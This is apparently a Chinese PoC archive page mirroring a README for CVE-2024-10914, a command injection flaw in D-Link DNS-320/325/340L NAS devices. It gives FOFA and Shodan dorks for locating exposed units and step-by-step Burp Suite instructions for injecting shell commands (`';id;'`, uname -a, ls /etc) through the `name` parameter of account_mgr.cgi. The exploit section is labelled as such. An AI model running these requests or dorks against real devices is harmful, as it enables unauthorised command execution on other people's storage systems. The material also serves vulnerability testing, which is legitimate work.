关联漏洞
标题:
D-Link多款产品 安全漏洞
(CVE-2024-10914)
描述:D-Link DNS-320等都是中国友讯(D-Link)公司的一款NAS(网络附属存储)设备。 D-Link多款产品存在安全漏洞,该漏洞源于对参数name的错误操作会导致操作系统命令注入。以下产品及版本受到影响:D-Link DNS-320、DNS-320LW、DNS-325和DNS-340L 20241028版本及之前版本。
描述
CVE-2024-10914_Manual testing with burpsuite
介绍
# CVE-2024-10914 Command Injection Vulnerability Testing for D-Link NAS_Manual testing with burpsuite
---
## Dork for Finding Vulnerable Devices
Use the following search dork to find potentially vulnerable D-Link NAS devices:
```
FOFA:
app="D_Link-DNS-ShareCenter" && server=="lighttpd/1.4.25-devel-fb150ff"
SHODAN:
"http.title:D-Link" product:"lighttpd"
```
This search string helps identify devices running the vulnerable D-Link DNS ShareCenter app with the specific version of the Lighttpd server that is affected by the vulnerability.
---
This guide provides step-by-step instructions on how to manually test for a Command Injection Vulnerability (CVE-2024-10914) in the `name` parameter of D-Link NAS using Burp Suite. Target URL: `http://Target`.
## Prerequisites
- Burp Suite
- A web browser configured to use Burp Suite as a proxy (typically set to `127.0.0.1:8080`)
---
## Step 1: Set Up Burp Suite
1. **Launch Burp Suite**: Start Burp Suite on your machine.
2. **Configure Proxy**: Ensure your browser is configured to use Burp Suite as its proxy by setting the browser's proxy settings to `127.0.0.1` on port `8080`.
---
## Step 2: Intercept the Request
1. **Navigate to the Target**: In your browser, go to `http://Target`.
2. **Enable Intercept**: In Burp Suite, enable the intercept feature to capture the outgoing request.
---
## Step 3: Modify the Request
1. **Locate the Vulnerable Parameter**: In the intercepted request, find the `name` parameter in the URL. It should appear as:
```plaintext
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;...;%27
```
2. **Inject a Test Command**: Modify the `name` parameter to include a test command like `echo "test"`:
```plaintext
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;echo%20%22test%22;%27
```
3. **Send the Modified Request**: Forward the modified request to the server.
---
## Step 4: Analyze the Response
1. **Check the Response**: Look for the output of the injected command in the response. For example, if the server executed `echo "test"`, you should see:
```plaintext
test
```
---
## Step 5: Exploit the Vulnerability
1. **Inject a Malicious Command**: If the test is successful, attempt more sophisticated commands, such as:
```plaintext
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27
```
2. **Send the Exploit Request**: Forward this request to the server.
3. **Analyze the Response**: Check if the output of the command (e.g., user ID info) is present in the response.
---
## Step 6: Automate with Burp Suite Extensions (Optional)
1. **Use Intruder**: Automate testing with Burp Suite's Intruder tool.
- Right-click the request and select **Send to Intruder**.
- Set the `name` parameter as the payload position.
- Use a list of commands as payloads for testing.
2. **Example Payloads**:
```plaintext
echo "test"
id
uname -a
ls /etc
```
3. **Start Intruder**: Run the Intruder attack to test multiple payloads automatically.
---
文件快照
[4.0K] /data/pocs/4c24e085a6d8b108ffcbb32b6d7c11b056df24e8
└── [3.0K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。